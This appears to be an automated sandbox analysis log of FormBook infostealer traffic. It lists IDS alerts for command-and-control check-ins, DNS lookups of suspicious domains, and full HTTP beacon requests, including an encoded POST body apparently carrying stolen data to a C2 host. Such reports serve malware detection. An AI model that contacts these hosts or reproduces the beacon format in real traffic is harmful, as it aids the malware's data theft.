            Source: Network trafficSuricata IDS: 2855464 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M3 : 192.168.2.4:49563 -> 3.33.130.190:80
            Source: Network trafficSuricata IDS: 2050745 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) M5 : 192.168.2.4:49663 -> 162.241.244.106:80
            Source: Network trafficSuricata IDS: 2855465 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (GET) M2 : 192.168.2.4:49663 -> 162.241.244.106:80
            Performs DNS queries to domains with low reputation
            Source: DNS query: www.uburn.xyz
            Source: DNS query: www.nakama2-sshl.xyz
            Source: DNS query: www.lurknlarkk.xyz
            Source: Joe Sandbox ViewIP Address: 172.191.244.62 172.191.244.62
            Source: Joe Sandbox ViewIP Address: 67.223.117.189 67.223.117.189
            Source: Joe Sandbox ViewASN Name: ATT-INTERNET4US ATT-INTERNET4US
            Source: Joe Sandbox ViewASN Name: VIMRO-AS15189US VIMRO-AS15189US
            Source: Joe Sandbox ViewASN Name: COMING-ASABCDEGROUPCOMPANYLIMITEDHK COMING-ASABCDEGROUPCOMPANYLIMITEDHK
            Source: Joe Sandbox ViewASN Name: AMAZON-AESUS AMAZON-AESUS
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
            Source: global trafficHTTP traffic detected: GET /7mju/?rf-LZ=JlCtuN3HqPO8C&AHkx=n/a1XNlERIMSMkzd8Qa3NcaSwh7bqsusoFUi8ENskqLMFqSk/Fj/a6kaQHlAIjdrNEumw+uIAi046Spw4+rc4tgWVH2vgFrx7lu5caWGLmQTjS3LtG8lVAw= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.newdaydawning.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /l8if/?AHkx=fb3YagVOau/9jH9JrwpuHsbxrllxr9uMjiH+G1UmZCjbhiKuBNxm8T0bbvZrtC77cOtGQaEUv2efn6v6V0IvhyZ1jg35IXHzinqtRNXlFD8GamKybSzcUs8=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.40wxd.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /iqqs/?rf-LZ=JlCtuN3HqPO8C&AHkx=f7Pu0FXPylRYdptkWs+23MtWxvoKJz6PgPaD0QQYagT1MtyUkVhu56FZSrYHt1j8AD8LTP1JVeTQ4dQlBUKb4laqx4Tc9G/2Lb24L4CzfFNZpkDBhe90DBs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.uburn.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /eruc/?AHkx=0pHn1M2gwaL5mql9jSi5Dhpkux55ATuoFGMXu3aa4qZIFhIZTp589V8RrAObS8se+RyZmJdkVQw9waSFdfaJQA9rTbpXDGB78xWioGNWodRvKelboLn2zrA=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.o731lh.vipConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /ui3j/?AHkx=Ezegw1wupX22aLPnmkEV6IMUn2bdHQLdsNrfcd+vuVznJDvywH1CwnPb30ViPb7vM8PbtSzEB5D6DwhwIFVA+4/F1XwzKY9WGJMvD1hFh5nZW5ehHhRHPVA=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.nakama2-sshl.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /ak5l/?rf-LZ=JlCtuN3HqPO8C&AHkx=eH+SO6exUc8kNdkvUVCoynUPLpD0oidFnmpLKbW7uuUzt7F+3QY5ZMk8901G8pDK6ZYhQ7vTWV07p9++0dQhJwia7KRoh2N0l2r+oB94KBnVCOyz53vPt1M= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.zz82x.topConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /b8ih/?AHkx=Odz4+FoaeIgH5S8C9OYZQc3ouWeZxTDEesAV9dDAx8uax8eIV9nl6gv+Nqhf7GxjMHuq3WRF/H9yecUAbTD83GPUGNWv010JVF29ycwpsNNUnGWJNXrEBFE=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.tukaari.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /6wpo/?AHkx=s9KIkrkzrqTbzkMmh7Bli3B0wEyBHaCwBa6qLgEcFDzVo4ZyZuXCeDvxdW3wzkiXZ/4dwHLmTrOaI9mNhjMAcV+6tVbS2gqGz3F/PYSng2mbFSIjOzq2Kmk=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.prj81oqde1.buzzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /p9u3/?AHkx=D1Jc/C1nh+BZL85ZeChw3l4+cioj8fKXqdphFMmfowbAWgC+evwb7cYTziaUWePLaVULTAuSiJlrRgQRJK1Ewp0jkjvaZxrb1x+aTR+tBdOAHUHhfEgGmf4=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.komart.shopConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /u6k6/?AHkx=dY5LfBxT8+4OTYgUENZhMVKOyd75/pKzLeRRn9zdsxFld7n68myH2Gd2W2FS03HPt+W/9NATFibZyiY45uryWU5ty+AJNLXNUa+K51k8edVyQTCKjNaYJ5Y=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.healthyloveforall.netConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /jqkr/?AHkx=j99yFPFWu1ukFCAnSMaPoqYJsGaKTyAIw9CibMKFTP9vYaGLd9Ca8ZMxvCgy8ZIQlD5WNv+rF4xM8fWyLzqu+KoA1mYPwgzWoJCMPt1Uicxvw1jTfpaTUc0=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.lurknlarkk.xyzConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /hya5/?rf-LZ=JlCtuN3HqPO8C&AHkx=kBImd3s/QyLjHyq7crISF49n+tt0DF04aEwkxNbGH3XUM96sRoRP4M1J0fvTDuXIyYiaCoNXLmg3Qmdc8wSzVCSMG3zCGblVdbb3qd6x39FLIiPv6fMrlbs= HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.mommymode.siteConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficHTTP traffic detected: GET /nuqv/?AHkx=cqR4daz/40w4b6reEtYQuTL/A0OxFlThnuSAX3LrEIyAZ4914Ww4a7UdeW+JTGwq/HZWal2FK/CEDxgqbNyvw1T8M+Okxh6a/XFlGr4hKR5quINsThV8goc=&rf-LZ=JlCtuN3HqPO8C HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USHost: www.polarmuseum.infoConnection: closeUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
            Source: global trafficDNS traffic detected: DNS query: www.newdaydawning.net
            Source: global trafficDNS traffic detected: DNS query: www.40wxd.top
            Source: global trafficDNS traffic detected: DNS query: www.uburn.xyz
            Source: global trafficDNS traffic detected: DNS query: www.i16zb920d.cfd
            Source: global trafficDNS traffic detected: DNS query: www.o731lh.vip
            Source: global trafficDNS traffic detected: DNS query: www.nakama2-sshl.xyz
            Source: global trafficDNS traffic detected: DNS query: www.zz82x.top
            Source: global trafficDNS traffic detected: DNS query: www.tukaari.shop
            Source: global trafficDNS traffic detected: DNS query: www.prj81oqde1.buzz
            Source: global trafficDNS traffic detected: DNS query: www.komart.shop
            Source: global trafficDNS traffic detected: DNS query: www.healthyloveforall.net
            Source: global trafficDNS traffic detected: DNS query: www.lurknlarkk.xyz
            Source: global trafficDNS traffic detected: DNS query: www.mommymode.site
            Source: global trafficDNS traffic detected: DNS query: www.polarmuseum.info
            Source: global trafficDNS traffic detected: DNS query: www
            Source: unknownHTTP traffic detected: POST /l8if/ HTTP/1.1Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Language: en-USAccept-Encoding: gzip, deflateHost: www.40wxd.topOrigin: http://www.40wxd.topConnection: closeCache-Control: max-age=0Content-Type: application/x-www-form-urlencodedContent-Length: 201Referer: http://www.40wxd.top/l8if/User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)Data Raw: 41 48 6b 78 3d 53 5a 66 34 5a 58 5a 4c 52 75 44 38 6c 6b 56 43 71 6d 35 35 46 72 69 71 72 56 46 41 7a 6f 4c 6d 36 53 4f 4e 47 79 4d 77 54 52 53 30 69 44 4b 63 52 4b 56 6d 30 6c 49 4c 44 50 4d 46 6f 47 2f 33 64 71 4e 7a 52 4e 56 74 70 42 4b 45 6d 37 72 47 62 67 34 34 6e 32 52 53 6f 68 54 30 58 46 4f 77 71 44 6a 6f 54 65 72 65 4e 51 39 5a 63 41 6e 41 62 44 58 45 63 59 2f 46 52 6f 6d 68 72 63 4d 46 33 74 58 31 76 74 55 6d 52 4a 52 52 69 63 2f 69 69 59 32 42 34 62 4c 66 6f 71 38 54 78 5a 56 6d 33 65 68 72 35 77 39 31 46 5a 75 6b 70 45 30 31 65 59 72 46 79 50 31 58 56 68 43 51 64 5a 32 50 35 67 3d 3d Data Ascii: AHkx=SZf4ZXZLRuD8lkVCqm55FriqrVFAzoLm6SONGyMwTRS0iDKcRKVm0lILDPMFoG/3dqNzRNVtpBKEm7rGbg44n2RSohT0XFOwqDjoTereNQ9ZcAnAbDXEcY/FRomhrcMF3tX1vtUmRJRRic/iiY2B4bLfoq8TxZVm3ehr5w91FZukpE01eYrFyP1XVhCQdZ2P5g==
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 12:19:24 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 12:19:27 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 12:19:29 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 09 Oct 2024 12:19:32 GMTContent-Type: text/htmlContent-Length: 146Connection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:19:39 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:19:41 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 47 4f 4f 47 4c 45 20 46 4f 4e 54 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 33 30 30 2c 33 30 30 69 2c 34 30 30 2c 34 30 30 69 2c 36 30 30 2c 36 30 30 69 2c 37 30 30 2c 37 30 30 69 2c 38 30 30 2c 38 30 30 69 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 6f 6e 74 20 41 77 65 73 6f 6d 65 20 35 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2f 63 73 73 2f 66 6f 6e 74 61 77 65 73 6f 6d 65 2d 61 6c 6c 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 46 61 62 6c 65 73 20 49 63 6f 6e 73 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 63 73 73 2f 66 61 62 6c 65 73 2d 69 63 6f 6e 73 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 09 Oct 2024 12:19:44 GMTServer: ApacheX-Frame-Options: SAMEORIGINContent-Length: 32106X-XSS-Protection: 1; mode=blockConnection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 64 65 73 63 72 69 70 74 69 6f 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 46 61 62 6c 65 73 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 61 75 74 68 6f 72 22 20 63 6f 6e 74 65 6e 74 3d 22 45 6e 74 65 72 70 72 69 73 65 20 44 65 76 65 6c 6f 70 6d 65 6e 74 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 63 75 73 74 6f 6d 2f 69 6d 61 67 65 73 2f 73 68 6f 72 74 63 75 74 2e 70 6e 67 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 0a 20 20 20 20 3c 21 2d 2d 20 61 6e 69 6d 61 74 65 2e 63 73 73 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 61 6e 69 6d 61 74 65 2e 63 73 73 2d 6d 61 73 74 65 72 2f 61 6e 69 6d 61 74 65 2e 6d 69 6e 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 21 2d 2d 20 4c 6f 61 64 20 53 63 72 65 65 6e 20 2d 2d 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 61 73 73 65 74 73 2f 76 65 6e 64 6f 72 2f 6c 6f 61 64 73 63 72 65 65 6e 2f 63 73 73 2f 73 70 69 6e 6b 69 74 2e 63 73 73 22 20 72 65 6c 3d 22 